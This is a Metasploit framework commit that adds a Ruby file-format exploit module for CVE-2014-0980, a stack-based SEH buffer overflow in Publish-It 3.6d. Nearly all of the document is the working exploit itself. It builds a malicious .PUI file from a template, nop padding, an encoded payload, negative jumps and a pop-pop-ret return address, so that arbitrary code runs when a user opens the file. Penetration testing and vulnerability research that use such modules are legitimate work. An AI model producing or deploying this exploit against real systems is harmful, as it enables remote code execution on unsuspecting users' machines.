Land #4792 @jakxx Publish It PUI file exploit

2015-03-18 20:59:54 -04:00 · 2015-03-18 20:59:54 -04:00 · 076f15f933
parent b33e7f477c 3f8ed56a9a
commit 076f15f933
2 changed files with 82 additions and 0 deletions
--- a/data/exploits/CVE-2014-0980.pui
+++ b/data/exploits/CVE-2014-0980.pui
--- a/modules/exploits/windows/fileformat/publishit_pui.rb
+++ b/modules/exploits/windows/fileformat/publishit_pui.rb
@ -0,0 +1,82 @@
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::FILEFORMAT
  def initialize(info = {})
    super(update_info(info,
      'Name'    => 'Publish-It PUI Buffer Overflow (SEH)',
      'Description'  => %q{
          This module exploits a stack based buffer overflow in Publish-It when
          processing a specially crafted .PUI file. This vulnerability could be
          exploited by a remote attacker to execute arbitrary code on the target
          machine by enticing a user of Publish-It to open a malicious .PUI file.
      },
      'License'    => MSF_LICENSE,
      'Author'    =>
        [
          'Daniel Kazimirow',  # Original discovery
          'Andrew Smith "jakx_"',  # Exploit and MSF Module
        ],
      'References'  =>
        [
          [ 'OSVDB', '102911' ],
          [ 'CVE', '2014-0980' ],
          [ 'EDB', '31461' ]
        ],
      'DefaultOptions' =>
        {
          'ExitFunction' => 'process',
        },
      'Platform'  => 'win',
      'Payload'  =>
        {
          'BadChars' => "\x00\x0b\x0a",
          'DisableNops' => true,
          'Space' => 377
        },
      'Targets'    =>
        [
          [ 'Publish-It 3.6d',
            {
              'Ret'     =>  0x0046e95a, #p/p/r | Publish.EXE
              'Offset'  =>  1082
            }
          ],
        ],
      'Privileged'  => false,
      'DisclosureDate'  => 'Feb 5 2014',
      'DefaultTarget'  => 0))
    register_options([OptString.new('FILENAME', [ true, 'The file name.', 'msf.pui']),], self.class)
  end
  def exploit
    path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0980.pui")
    fd = File.open(path, "rb")
    template_data = fd.read(fd.stat.size)
    fd.close
    buffer = template_data
    buffer << make_nops(700)
    buffer << payload.encoded
    buffer << make_nops(target['Offset']-payload.encoded.length-700-5)
    buffer << Rex::Arch::X86.jmp('$-399') #long negative jump -399
    buffer << Rex::Arch::X86.jmp_short('$-24') #nseh negative jump
    buffer << make_nops(2)
    buffer << [target.ret].pack("V")
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(buffer)
  end
 end